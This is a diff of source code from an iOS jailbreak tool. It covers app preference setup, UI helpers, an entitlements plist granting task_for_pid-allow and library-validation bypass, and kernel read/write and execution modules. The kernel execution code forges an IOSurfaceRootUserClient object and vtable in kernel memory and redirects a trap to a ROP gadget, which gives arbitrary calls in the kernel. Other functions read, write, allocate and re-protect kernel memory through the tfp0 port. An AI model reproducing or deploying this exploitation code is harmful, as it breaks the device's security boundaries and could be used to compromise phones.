||||
ba6d927670a3d16eea0930c13ce60720 ./etc/apt/trusted.gpg.d/modmyi.gpg
|
||||
f2df1c620b1de53b3328f7d16be06317 ./etc/apt/trusted.gpg.d/saurik.gpg
|
||||
69c4ba7f08363e998e0f2e244a04f881 ./etc/alternatives/README
|
||||
9f17f5160584913c1ac2395923f233df ./default.ent
|
||||
Binary file not shown.
Binary file not shown.
@@ -1,15 +0,0 @@
|
||||
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||||
<plist version="1.0">
|
||||
<dict>
|
||||
<key>com.apple.private.skip-library-validation</key>
|
||||
<true/>
|
||||
<key>com.apple.springboard.debugapplications</key>
|
||||
<true/>
|
||||
<key>dynamic-codesigning</key>
|
||||
<true/>
|
||||
<key>platform-application</key>
|
||||
<true/>
|
||||
<key>task_for_pid-allow</key>
|
||||
<true/>
|
||||
</dict>
|
||||
</plist>
|
||||
Binary file not shown.
@@ -11,6 +11,7 @@
|
||||
#include "JailbreakViewController.h"
|
||||
#include "SettingsTableViewController.h"
|
||||
#include "utils.h"
|
||||
#include "prefs.h"
|
||||
|
||||
@interface AppDelegate ()
|
||||
|
||||
@@ -77,88 +78,14 @@
|
||||
// Override point for customization after application launch.
|
||||
[self initPrefs];
|
||||
[self initShortcuts];
|
||||
UIApplication.sharedApplication.idleTimerDisabled = TRUE;
|
||||
return YES;
|
||||
}
|
||||
|
||||
|
||||
- (void)initPrefs {
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_TWEAK_INJECTION] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_TWEAK_INJECTION];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_LOAD_DAEMONS] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_LOAD_DAEMONS];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_DUMP_APTICKET] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_DUMP_APTICKET];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_REFRESH_ICON_CACHE] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_REFRESH_ICON_CACHE];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_BOOT_NONCE] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setObject:@"0x1111111111111111" forKey:K_BOOT_NONCE];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_EXPLOIT] != nil &&
|
||||
!supportsExploit((exploit_t)[[NSUserDefaults standardUserDefaults] integerForKey:K_EXPLOIT])) {
|
||||
[[NSUserDefaults standardUserDefaults] removeObjectForKey:K_EXPLOIT];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_EXPLOIT] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setInteger:recommendedJailbreakSupport() forKey:K_EXPLOIT];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_DISABLE_AUTO_UPDATES] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_DISABLE_AUTO_UPDATES];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_DISABLE_APP_REVOKES] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_DISABLE_APP_REVOKES];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_OVERWRITE_BOOT_NONCE] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_OVERWRITE_BOOT_NONCE];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_EXPORT_KERNEL_TASK_PORT] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_EXPORT_KERNEL_TASK_PORT];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_RESTORE_ROOTFS] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_RESTORE_ROOTFS];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_INCREASE_MEMORY_LIMIT] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_INCREASE_MEMORY_LIMIT];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_ECID] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setObject:@"0x0" forKey:K_ECID];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_INSTALL_CYDIA] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_INSTALL_CYDIA];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_INSTALL_OPENSSH] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_INSTALL_OPENSSH];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_RELOAD_SYSTEM_DAEMONS] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_RELOAD_SYSTEM_DAEMONS];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_HIDE_LOG_WINDOW] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_HIDE_LOG_WINDOW];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
if ([[NSUserDefaults standardUserDefaults] objectForKey:K_RESET_CYDIA_CACHE] == nil) {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_RESET_CYDIA_CACHE];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
}
|
||||
register_default_prefs();
|
||||
repair_prefs();
|
||||
}
|
||||
|
||||
- (void)initShortcuts {
|
||||
|
||||
@@ -403,10 +403,7 @@ NSDictionary *getPkgs(void) {
|
||||
}
|
||||
}
|
||||
}
|
||||
if (line) {
|
||||
free(line);
|
||||
line = NULL;
|
||||
}
|
||||
SafeFreeNULL(line);
|
||||
fclose(pkgs_file);
|
||||
|
||||
mpkgs[@"firmware"] = @{
|
||||
|
||||
@@ -7,13 +7,11 @@
|
||||
//
|
||||
|
||||
#import <UIKit/UIKit.h>
|
||||
#import <UIProgressHUD.h>
|
||||
#import "common.h"
|
||||
|
||||
#define __FILENAME__ (__builtin_strrchr(__FILE__, '/') ? __builtin_strrchr(__FILE__, '/') + 1 : __FILE__)
|
||||
|
||||
static NSString *message = nil;
|
||||
#define SETMESSAGE(msg) (message = msg)
|
||||
|
||||
#define _assert(test, message, fatal) do \
|
||||
if (!(test)) { \
|
||||
int saved_errno = errno; \
|
||||
@@ -28,11 +26,24 @@ static NSString *message = nil;
|
||||
} else { \
|
||||
return; \
|
||||
} \
|
||||
errno = saved_errno; \
|
||||
} \
|
||||
} \
|
||||
while (false)
|
||||
|
||||
#define NOTICE(msg, wait, destructive) showAlert(@"Notice", msg, wait, destructive)
|
||||
#define notice(msg, wait, destructive) showAlert(@"Notice", msg, wait, destructive)
|
||||
|
||||
#define status(msg, btnenbld, tbenbld) do { \
|
||||
LOG("Status: %@", msg); \
|
||||
dispatch_async(dispatch_get_main_queue(), ^{ \
|
||||
[UIView performWithoutAnimation:^{ \
|
||||
[[[JailbreakViewController sharedController] goButton] setEnabled:btnenbld]; \
|
||||
[[[[JailbreakViewController sharedController] tabBarController] tabBar] setUserInteractionEnabled:tbenbld]; \
|
||||
[[[JailbreakViewController sharedController] goButton] setTitle:msg forState: btnenbld ? UIControlStateNormal : UIControlStateDisabled]; \
|
||||
[[[JailbreakViewController sharedController] goButton] layoutIfNeeded]; \
|
||||
}]; \
|
||||
}); \
|
||||
} while (false)
|
||||
|
||||
@interface JailbreakViewController : UIViewController
|
||||
@property (weak, nonatomic) IBOutlet UIButton *goButton;
|
||||
@@ -51,6 +62,39 @@ NSString *hexFromInt(NSInteger val);
|
||||
|
||||
@end
|
||||
|
||||
static inline UIProgressHUD *addProgressHUD() {
|
||||
__block UIProgressHUD *hud = nil;
|
||||
dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
|
||||
dispatch_async(dispatch_get_main_queue(), ^{
|
||||
hud = [[UIProgressHUD alloc] init];
|
||||
[hud setAutoresizingMask:UIViewAutoresizingFlexibleWidth | UIViewAutoresizingFlexibleHeight];
|
||||
UIView *view = [[JailbreakViewController sharedController] view];
|
||||
[hud showInView:view];
|
||||
dispatch_semaphore_signal(semaphore);
|
||||
});
|
||||
dispatch_semaphore_wait(semaphore, DISPATCH_TIME_FOREVER);
|
||||
return hud;
|
||||
}
|
||||
|
||||
static inline void removeProgressHUD(UIProgressHUD *hud) {
|
||||
dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
|
||||
dispatch_async(dispatch_get_main_queue(), ^{
|
||||
[hud hide];
|
||||
[hud done];
|
||||
dispatch_semaphore_signal(semaphore);
|
||||
});
|
||||
dispatch_semaphore_wait(semaphore, DISPATCH_TIME_FOREVER);
|
||||
}
|
||||
|
||||
static inline void updateProgressHUD(UIProgressHUD *hud, NSString *msg) {
|
||||
dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
|
||||
dispatch_async(dispatch_get_main_queue(), ^{
|
||||
[hud setText:msg];
|
||||
dispatch_semaphore_signal(semaphore);
|
||||
});
|
||||
dispatch_semaphore_wait(semaphore, DISPATCH_TIME_FOREVER);
|
||||
}
|
||||
|
||||
static inline void showAlertWithCancel(NSString *title, NSString *message, Boolean wait, Boolean destructive, NSString *cancel) {
|
||||
dispatch_semaphore_t semaphore;
|
||||
if (wait)
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
@@ -1,7 +1,6 @@
|
||||
#include <inttypes.h>
|
||||
#include <common.h>
|
||||
#include <mach/mach.h>
|
||||
|
||||
mach_port_t prepare_user_client(void);
|
||||
void init_kexecute(void);
|
||||
void term_kexecute(void);
|
||||
uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6);
|
||||
bool init_kexec(void);
|
||||
void term_kexec(void);
|
||||
kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6);
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
#include "KernelExecution.h"
|
||||
#include "KernelMemory.h"
|
||||
#include "KernelStructureOffsets.h"
|
||||
#include "KernelOffsets.h"
|
||||
#include "KernelUtilities.h"
|
||||
#include "find_port.h"
|
||||
#include "kernel_call.h"
|
||||
@@ -8,9 +8,12 @@
|
||||
#include <iokit.h>
|
||||
#include <pthread.h>
|
||||
#import <patchfinder64.h>
|
||||
#include "parameters.h"
|
||||
#include "kc_parameters.h"
|
||||
#include "kernel_memory.h"
|
||||
|
||||
#if !__arm64e__
|
||||
mach_port_t prepare_user_client()
|
||||
static mach_port_t prepare_user_client()
|
||||
{
|
||||
kern_return_t err;
|
||||
mach_port_t user_client;
|
||||
@@ -27,38 +30,49 @@ mach_port_t prepare_user_client()
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
LOG("got user client: 0x%x", user_client);
|
||||
return user_client;
|
||||
}
|
||||
|
||||
pthread_mutex_t kexecute_lock;
|
||||
static mach_port_t user_client;
|
||||
static uint64_t IOSurfaceRootUserClient_port;
|
||||
static uint64_t IOSurfaceRootUserClient_addr;
|
||||
static uint64_t fake_vtable;
|
||||
static uint64_t fake_client;
|
||||
const int fake_kalloc_size = 0x1000;
|
||||
static kptr_t IOSurfaceRootUserClient_port;
|
||||
static kptr_t IOSurfaceRootUserClient_addr;
|
||||
static kptr_t fake_vtable;
|
||||
static kptr_t fake_client;
|
||||
static const int fake_kalloc_size = 0x1000;
|
||||
#endif
|
||||
static pthread_mutex_t kexec_lock;
|
||||
|
||||
void init_kexecute()
|
||||
bool init_kexec()
|
||||
{
|
||||
#if __arm64e__
|
||||
kernel_call_init();
|
||||
if (!parameters_init()) return false;
|
||||
kernel_task_port = tfp0;
|
||||
if (!MACH_PORT_VALID(kernel_task_port)) return false;
|
||||
current_task = ReadKernel64(task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
|
||||
if (!KERN_POINTER_VALID(current_task)) return false;
|
||||
kernel_task = ReadKernel64(getoffset(kernel_task));
|
||||
if (!KERN_POINTER_VALID(kernel_task)) return false;
|
||||
if (!kernel_call_init()) return false;
|
||||
#else
|
||||
user_client = prepare_user_client();
|
||||
if (!MACH_PORT_VALID(user_client)) return false;
|
||||
|
||||
// From v0rtex - get the IOSurfaceRootUserClient port, and then the address of the actual client, and vtable
|
||||
IOSurfaceRootUserClient_port = get_address_of_port(getpid(), user_client); // UserClients are just mach_ports, so we find its address
|
||||
if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_port)) return false;
|
||||
|
||||
IOSurfaceRootUserClient_addr = ReadKernel64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); // The UserClient itself (the C++ object) is at the kobject field
|
||||
if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_addr)) return false;
|
||||
|
||||
uint64_t IOSurfaceRootUserClient_vtab = ReadKernel64(IOSurfaceRootUserClient_addr); // vtables in C++ are at *object
|
||||
kptr_t IOSurfaceRootUserClient_vtab = ReadKernel64(IOSurfaceRootUserClient_addr); // vtables in C++ are at *object
|
||||
if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_vtab)) return false;
|
||||
|
||||
// The aim is to create a fake client, with a fake vtable, and overwrite the existing client with the fake one
|
||||
// Once we do that, we can use IOConnectTrap6 to call functions in the kernel as the kernel
|
||||
|
||||
// Create the vtable in the kernel memory, then copy the existing vtable into there
|
||||
fake_vtable = kmem_alloc(fake_kalloc_size);
|
||||
if (!KERN_POINTER_VALID(fake_vtable)) return false;
|
||||
|
||||
for (int i = 0; i < 0x200; i++) {
|
||||
WriteKernel64(fake_vtable + i * 8, ReadKernel64(IOSurfaceRootUserClient_vtab + i * 8));
|
||||
@@ -66,6 +80,7 @@ void init_kexecute()
|
||||
|
||||
// Create the fake user client
|
||||
fake_client = kmem_alloc(fake_kalloc_size);
|
||||
if (!KERN_POINTER_VALID(fake_client)) return false;
|
||||
|
||||
for (int i = 0; i < 0x200; i++) {
|
||||
WriteKernel64(fake_client + i * 8, ReadKernel64(IOSurfaceRootUserClient_addr + i * 8));
|
||||
@@ -80,13 +95,14 @@ void init_kexecute()
|
||||
// Now the userclient port we have will look into our fake user client rather than the old one
|
||||
|
||||
// Replace IOUserClient::getExternalTrapForIndex with our ROP gadget (add x0, x0, #0x40; ret;)
|
||||
WriteKernel64(fake_vtable + 8 * 0xB7, GETOFFSET(add_x0_x0_0x40_ret));
|
||||
WriteKernel64(fake_vtable + 8 * 0xB7, getoffset(add_x0_x0_0x40_ret));
|
||||
|
||||
pthread_mutex_init(&kexecute_lock, NULL);
|
||||
#endif
|
||||
pthread_mutex_init(&kexec_lock, NULL);
|
||||
return true;
|
||||
}
|
||||
|
||||
void term_kexecute()
|
||||
void term_kexec()
|
||||
{
|
||||
#if __arm64e__
|
||||
kernel_call_deinit();
|
||||
@@ -94,16 +110,18 @@ void term_kexecute()
|
||||
WriteKernel64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), IOSurfaceRootUserClient_addr);
|
||||
kmem_free(fake_vtable, fake_kalloc_size);
|
||||
kmem_free(fake_client, fake_kalloc_size);
|
||||
IOServiceClose(user_client);
|
||||
#endif
|
||||
pthread_mutex_destroy(&kexec_lock);
|
||||
}
|
||||
|
||||
uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6)
|
||||
kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6)
|
||||
{
|
||||
kptr_t returnval = 0;
|
||||
pthread_mutex_lock(&kexec_lock);
|
||||
#if __arm64e__
|
||||
return kernel_call_7(addr, x0, x1, x2, x3, x4, x5, x6);
|
||||
returnval = kernel_call_7(ptr, 7, x0, x1, x2, x3, x4, x5, x6);
|
||||
#else
|
||||
pthread_mutex_lock(&kexecute_lock);
|
||||
|
||||
// When calling IOConnectTrapX, this makes a call to iokit_user_client_trap, which is the user->kernel call (MIG). This then calls IOUserClient::getTargetAndTrapForIndex
|
||||
// to get the trap struct (which contains an object and the function pointer itself). This function calls IOUserClient::getExternalTrapForIndex, which is expected to return a trap.
|
||||
// This jumps to our gadget, which returns +0x40 into our fake user_client, which we can modify. The function is then called on the object. But how C++ actually works is that the
|
||||
@@ -114,16 +132,14 @@ uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t
|
||||
// We will pull a switch when doing so - retrieve the current contents, call the trap, put back the contents
|
||||
// (i'm not actually sure if the switch back is necessary but meh)
|
||||
|
||||
uint64_t offx20 = ReadKernel64(fake_client + 0x40);
|
||||
uint64_t offx28 = ReadKernel64(fake_client + 0x48);
|
||||
kptr_t offx20 = ReadKernel64(fake_client + 0x40);
|
||||
kptr_t offx28 = ReadKernel64(fake_client + 0x48);
|
||||
WriteKernel64(fake_client + 0x40, x0);
|
||||
WriteKernel64(fake_client + 0x48, addr);
|
||||
uint64_t returnval = IOConnectTrap6(user_client, 0, x1, x2, x3, x4, x5, x6);
|
||||
WriteKernel64(fake_client + 0x48, ptr);
|
||||
returnval = IOConnectTrap6(user_client, 0, x1, x2, x3, x4, x5, x6);
|
||||
WriteKernel64(fake_client + 0x40, offx20);
|
||||
WriteKernel64(fake_client + 0x48, offx28);
|
||||
|
||||
pthread_mutex_unlock(&kexecute_lock);
|
||||
|
||||
return returnval;
|
||||
#endif
|
||||
pthread_mutex_unlock(&kexec_lock);
|
||||
return returnval;
|
||||
}
|
||||
|
||||
@@ -7,6 +7,9 @@
|
||||
#include "KernelUtilities.h"
|
||||
#include <common.h>
|
||||
|
||||
size_t kreads = 0;
|
||||
size_t kwrites = 0;
|
||||
|
||||
// the exploit bootstraps the full kernel memory read/write with a fake
|
||||
// task which just allows reading via the bsd_info->pid trick
|
||||
// this first port is kmem_read_port
|
||||
@@ -29,15 +32,15 @@ void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0)
|
||||
|
||||
bool have_kmem_read()
|
||||
{
|
||||
return (kmem_read_port != MACH_PORT_NULL) || (tfp0 != MACH_PORT_NULL);
|
||||
return MACH_PORT_VALID(kmem_read_port) || MACH_PORT_VALID(tfp0);
|
||||
}
|
||||
|
||||
bool have_kmem_write()
|
||||
{
|
||||
return (tfp0 != MACH_PORT_NULL);
|
||||
return MACH_PORT_VALID(tfp0);
|
||||
}
|
||||
|
||||
size_t kread(uint64_t where, void* p, size_t size)
|
||||
size_t kread(kptr_t where, void* p, size_t size)
|
||||
{
|
||||
int rv;
|
||||
size_t offset = 0;
|
||||
@@ -57,10 +60,11 @@ size_t kread(uint64_t where, void* p, size_t size)
|
||||
}
|
||||
offset += sz;
|
||||
}
|
||||
kreads += offset;
|
||||
return offset;
|
||||
}
|
||||
|
||||
size_t kwrite(uint64_t where, const void* p, size_t size)
|
||||
size_t kwrite(kptr_t where, const void* p, size_t size)
|
||||
{
|
||||
int rv;
|
||||
size_t offset = 0;
|
||||
@@ -79,43 +83,41 @@ size_t kwrite(uint64_t where, const void* p, size_t size)
|
||||
}
|
||||
offset += chunk;
|
||||
}
|
||||
kwrites += offset;
|
||||
return offset;
|
||||
}
|
||||
|
||||
bool wkbuffer(uint64_t kaddr, void* buffer, size_t length)
|
||||
bool wkbuffer(kptr_t kaddr, void* buffer, size_t length)
|
||||
{
|
||||
if (tfp0 == MACH_PORT_NULL) {
|
||||
if (!MACH_PORT_VALID(tfp0)) {
|
||||
LOG("attempt to write to kernel memory before any kernel memory write primitives available");
|
||||
return false;
|
||||
}
|
||||
|
||||
|
||||
return (kwrite(kaddr, buffer, length) == length);
|
||||
}
|
||||
|
||||
bool rkbuffer(uint64_t kaddr, void* buffer, size_t length)
|
||||
bool rkbuffer(kptr_t kaddr, void* buffer, size_t length)
|
||||
{
|
||||
if (!MACH_PORT_VALID(tfp0)) {
|
||||
LOG("attempt to read kernel memory but no kernel memory read primitives available");
|
||||
return 0;
|
||||
}
|
||||
|
||||
return (kread(kaddr, buffer, length) == length);
|
||||
}
|
||||
|
||||
void WriteKernel32(uint64_t kaddr, uint32_t val)
|
||||
bool WriteKernel32(kptr_t kaddr, uint32_t val)
|
||||
{
|
||||
if (tfp0 == MACH_PORT_NULL) {
|
||||
LOG("attempt to write to kernel memory before any kernel memory write primitives available");
|
||||
return;
|
||||
}
|
||||
wkbuffer(kaddr, &val, sizeof(val));
|
||||
return wkbuffer(kaddr, &val, sizeof(val));
|
||||
}
|
||||
|
||||
void WriteKernel64(uint64_t kaddr, uint64_t val)
|
||||
bool WriteKernel64(kptr_t kaddr, uint64_t val)
|
||||
{
|
||||
if (tfp0 == MACH_PORT_NULL) {
|
||||
LOG("attempt to write to kernel memory before any kernel memory write primitives available");
|
||||
return;
|
||||
}
|
||||
wkbuffer(kaddr, &val, sizeof(val));
|
||||
return wkbuffer(kaddr, &val, sizeof(val));
|
||||
}
|
||||
|
||||
uint32_t rk32_via_kmem_read_port(uint64_t kaddr)
|
||||
uint32_t rk32_via_kmem_read_port(kptr_t kaddr)
|
||||
{
|
||||
kern_return_t err;
|
||||
if (kmem_read_port == MACH_PORT_NULL) {
|
||||
@@ -141,14 +143,14 @@ uint32_t rk32_via_kmem_read_port(uint64_t kaddr)
|
||||
return val;
|
||||
}
|
||||
|
||||
uint32_t rk32_via_tfp0(uint64_t kaddr)
|
||||
uint32_t rk32_via_tfp0(kptr_t kaddr)
|
||||
{
|
||||
uint32_t val = 0;
|
||||
rkbuffer(kaddr, &val, sizeof(val));
|
||||
return val;
|
||||
}
|
||||
|
||||
uint64_t rk64_via_kmem_read_port(uint64_t kaddr)
|
||||
uint64_t rk64_via_kmem_read_port(kptr_t kaddr)
|
||||
{
|
||||
uint64_t lower = rk32_via_kmem_read_port(kaddr);
|
||||
uint64_t higher = rk32_via_kmem_read_port(kaddr + 4);
|
||||
@@ -156,48 +158,41 @@ uint64_t rk64_via_kmem_read_port(uint64_t kaddr)
|
||||
return full;
|
||||
}
|
||||
|
||||
uint64_t rk64_via_tfp0(uint64_t kaddr)
|
||||
uint64_t rk64_via_tfp0(kptr_t kaddr)
|
||||
{
|
||||
uint64_t val = 0;
|
||||
rkbuffer(kaddr, &val, sizeof(val));
|
||||
return val;
|
||||
}
|
||||
|
||||
uint32_t ReadKernel32(uint64_t kaddr)
|
||||
uint32_t ReadKernel32(kptr_t kaddr)
|
||||
{
|
||||
if (tfp0 != MACH_PORT_NULL) {
|
||||
if (MACH_PORT_VALID(tfp0)) {
|
||||
return rk32_via_tfp0(kaddr);
|
||||
}
|
||||
|
||||
if (kmem_read_port != MACH_PORT_NULL) {
|
||||
} else if (MACH_PORT_VALID(kmem_read_port)) {
|
||||
return rk32_via_kmem_read_port(kaddr);
|
||||
} else {
|
||||
LOG("attempt to read kernel memory but no kernel memory read primitives available");
|
||||
return 0;
|
||||
}
|
||||
|
||||
LOG("attempt to read kernel memory but no kernel memory read primitives available");
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
uint64_t ReadKernel64(uint64_t kaddr)
|
||||
uint64_t ReadKernel64(kptr_t kaddr)
|
||||
{
|
||||
if (tfp0 != MACH_PORT_NULL) {
|
||||
if (MACH_PORT_VALID(tfp0)) {
|
||||
return rk64_via_tfp0(kaddr);
|
||||
}
|
||||
|
||||
if (kmem_read_port != MACH_PORT_NULL) {
|
||||
} else if (MACH_PORT_VALID(kmem_read_port)) {
|
||||
return rk64_via_kmem_read_port(kaddr);
|
||||
} else {
|
||||
LOG("attempt to read kernel memory but no kernel memory read primitives available");
|
||||
return 0;
|
||||
}
|
||||
|
||||
LOG("attempt to read kernel memory but no kernel memory read primitives available");
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
const uint64_t kernel_address_space_base = 0xffff000000000000;
|
||||
void kmemcpy(uint64_t dest, uint64_t src, uint32_t length)
|
||||
{
|
||||
if (dest >= kernel_address_space_base) {
|
||||
// copy to kernel:
|
||||
if (KERN_POINTER_VALID(dest)) {
|
||||
// copy to kernel
|
||||
wkbuffer(dest, (void*)src, length);
|
||||
} else {
|
||||
// copy from kernel
|
||||
@@ -205,9 +200,9 @@ void kmemcpy(uint64_t dest, uint64_t src, uint32_t length)
|
||||
}
|
||||
}
|
||||
|
||||
uint64_t kmem_alloc(uint64_t size)
|
||||
kptr_t kmem_alloc(uint64_t size)
|
||||
{
|
||||
if (tfp0 == MACH_PORT_NULL) {
|
||||
if (!MACH_PORT_VALID(tfp0)) {
|
||||
LOG("attempt to allocate kernel memory before any kernel memory write primitives available");
|
||||
return 0;
|
||||
}
|
||||
@@ -220,12 +215,13 @@ uint64_t kmem_alloc(uint64_t size)
|
||||
LOG("unable to allocate kernel memory via tfp0: %s %x", mach_error_string(err), err);
|
||||
return 0;
|
||||
}
|
||||
|
||||
return addr;
|
||||
}
|
||||
|
||||
uint64_t kmem_alloc_wired(uint64_t size)
|
||||
kptr_t kmem_alloc_wired(uint64_t size)
|
||||
{
|
||||
if (tfp0 == MACH_PORT_NULL) {
|
||||
if (!MACH_PORT_VALID(tfp0)) {
|
||||
LOG("attempt to allocate kernel memory before any kernel memory write primitives available");
|
||||
return 0;
|
||||
}
|
||||
@@ -234,36 +230,34 @@ uint64_t kmem_alloc_wired(uint64_t size)
|
||||
mach_vm_address_t addr = 0;
|
||||
mach_vm_size_t ksize = round_page_kernel(size);
|
||||
|
||||
LOG("vm_kernel_page_size: %lx", vm_kernel_page_size);
|
||||
|
||||
err = mach_vm_allocate(tfp0, &addr, ksize + 0x4000, VM_FLAGS_ANYWHERE);
|
||||
if (err != KERN_SUCCESS) {
|
||||
LOG("unable to allocate kernel memory via tfp0: %s %x", mach_error_string(err), err);
|
||||
return 0;
|
||||
}
|
||||
|
||||
LOG("allocated address: %llx", addr);
|
||||
|
||||
addr += 0x3fff;
|
||||
addr &= ~0x3fffull;
|
||||
|
||||
LOG("address to wire: %llx", addr);
|
||||
|
||||
err = mach_vm_wire(fake_host_priv(), tfp0, addr, ksize, VM_PROT_READ | VM_PROT_WRITE);
|
||||
host_t host = mach_host_self();
|
||||
err = mach_vm_wire(host, tfp0, addr, ksize, VM_PROT_READ | VM_PROT_WRITE);
|
||||
mach_port_deallocate(mach_task_self(), host);
|
||||
host = HOST_NULL;
|
||||
if (err != KERN_SUCCESS) {
|
||||
LOG("unable to wire kernel memory via tfp0: %s %x", mach_error_string(err), err);
|
||||
return 0;
|
||||
}
|
||||
|
||||
return addr;
|
||||
}
|
||||
|
||||
bool kmem_free(uint64_t kaddr, uint64_t size)
|
||||
bool kmem_free(kptr_t kaddr, uint64_t size)
|
||||
{
|
||||
if (tfp0 == MACH_PORT_NULL) {
|
||||
if (!MACH_PORT_VALID(tfp0)) {
|
||||
LOG("attempt to deallocate kernel memory before any kernel memory write primitives available");
|
||||
return false;
|
||||
}
|
||||
|
||||
|
||||
kern_return_t err;
|
||||
mach_vm_size_t ksize = round_page_kernel(size);
|
||||
err = mach_vm_deallocate(tfp0, kaddr, ksize);
|
||||
@@ -271,20 +265,23 @@ bool kmem_free(uint64_t kaddr, uint64_t size)
|
||||
LOG("unable to deallocate kernel memory via tfp0: %s %x", mach_error_string(err), err);
|
||||
return false;
|
||||
}
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
bool kmem_protect(uint64_t kaddr, uint32_t size, int prot)
|
||||
bool kmem_protect(kptr_t kaddr, uint32_t size, vm_prot_t prot)
|
||||
{
|
||||
if (tfp0 == MACH_PORT_NULL) {
|
||||
if (!MACH_PORT_VALID(tfp0)) {
|
||||
LOG("attempt to change protection of kernel memory before any kernel memory write primitives available");
|
||||
return false;
|
||||
}
|
||||
|
||||
kern_return_t err;
|
||||
err = mach_vm_protect(tfp0, (mach_vm_address_t)kaddr, (mach_vm_size_t)size, 0, (vm_prot_t)prot);
|
||||
if (err != KERN_SUCCESS) {
|
||||
LOG("unable to change protection of kernel memory via tfp0: %s %x", mach_error_string(err), err);
|
||||
return false;
|
||||
}
|
||||
|
||||
return true;
